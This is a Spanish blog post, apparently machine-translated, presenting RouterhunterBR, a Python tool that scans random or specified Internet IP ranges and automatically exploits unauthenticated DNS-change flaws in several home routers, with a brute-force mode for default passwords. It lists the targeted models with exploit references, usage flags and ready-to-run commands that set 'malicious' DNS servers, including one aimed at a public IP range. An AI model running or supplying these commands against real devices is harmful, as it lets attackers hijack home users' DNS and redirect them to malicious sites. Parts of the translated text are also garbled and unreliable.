El RouterhunterBR Que es una
herramienta de seguridad automatizada encuentra vulnerabilidades y
realiza pruebas en los routers y dispositivos vulnerables en Internet.
El RouterhunterBR fue diseñado para funcionar a través de Internet en
busca de pistas ips definidos o al azar con el fin de explotar de forma
automática el DNSChanger la vulnerabilidad de los routers domésticos.
El DNSChanger es un troyano capaz de
dirigir peticiones de los usuarios a sitios ilegales. En la práctica,
este malware tiene la capacidad de cambiar la configuración DNS de
nuestra máquina de redirigir al usuario a sitios con fines maliciosos.
Imagínese, por ejemplo, que su sistema está infectado con este malware,
lo que podría ocurrir es que el usuario tenga acceso a un sitio en
particular (por ejemplo. Facebook.com) puede ser enviada a un sitio web
no solicitados y potencialmente ilegal.
El guión explora cuatro vulnerabilidades en los routers
Tech traslado ADSL Modem-Router 915 WM / sin autenticar DNS remoto
Cambio Exploitreference: http://www.exploit-db.com/exploits/35995/
D-Link DSL-2740R / sin autenticar DNS remoto Cambio Exploitreference: http://www.exploit-db.com/exploits/35917/
D-Link DSL-2640B sin autenticar DNS remoto Cambio Exploitreference: http://1337day.com/exploit/23302/
D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
reference: https://www.exploit-db.com/exploits/37237/
reference: https://www.exploit-db.com/exploits/37237/
D-Link DSL-2730B AU_2.01 - omisión de autenticación de DNS Changereference: https://www.exploit-db.com/exploits/37240/
D-Link DSL-526B ADSL2 AU_2.01 - No autenticado Changereference DNS remoto: https://www.exploit-db.com/exploits/37241/
routers autenticados - - DSLink 260E DNS Changer - bruteforce de
referencia:
https://www.youtube.com/watch?v=tNjy91g2Rakhttp://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html
requerimiento
import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime
Uso
-range 192.168.1.0-255, --range 192.168.1.0-255 Set range of IP
-bruteforce, --bruteforce Performs brute force with users and passwords standards, and soon after defines the malicious DNS.
-startip 192.168.*.*, --startip 192.168.*.* Start - IP range customized with wildcard / 201.*.*.*
-endip 192.168.*.*, --endip 192.168.*.* End - IP range customized with wildcard / 201.*.*.*
-dns1 8.8.8.8, --dns1 8.8.8.8 Define malicious dns1
-dns2 8.8.4.4, --dns2 8.8.4.4 Define malicious dns2
--threads 10 Set threads numbers
-rip, --randomip Randomizing ips routers
-lmtip 10, --limitip 10 Define limite random ip
comandos
ips al azar
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
Escáner de IP gama:
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
rango de IP para requisitos particulares con comodín / Ex: --startip 201 * * * - --endip 201 * * *......
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
La fuerza bruta con usuarios y contraseñas en los routers que requiere
autenticación, obligando a la alteración de DNS - DSLink 260E.
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10
- AUTOR: Jhonathan Davi A.K.A jh00nbr
- EMAIL*: jhoonbr@protonmail.ch
- Blog: http://blog.inurl.com.br
- Twitter: https://twitter.com/jh00nbr
- Facebook: https://fb.com/JhonVipNet
- Fanpage: https://fb.com/InurlBrasil
- Github: https://github.com/jh00nbr/
- Youtube: https://www.youtube.com/c/Mrsinisterboy
No hay comentarios:
Publicar un comentario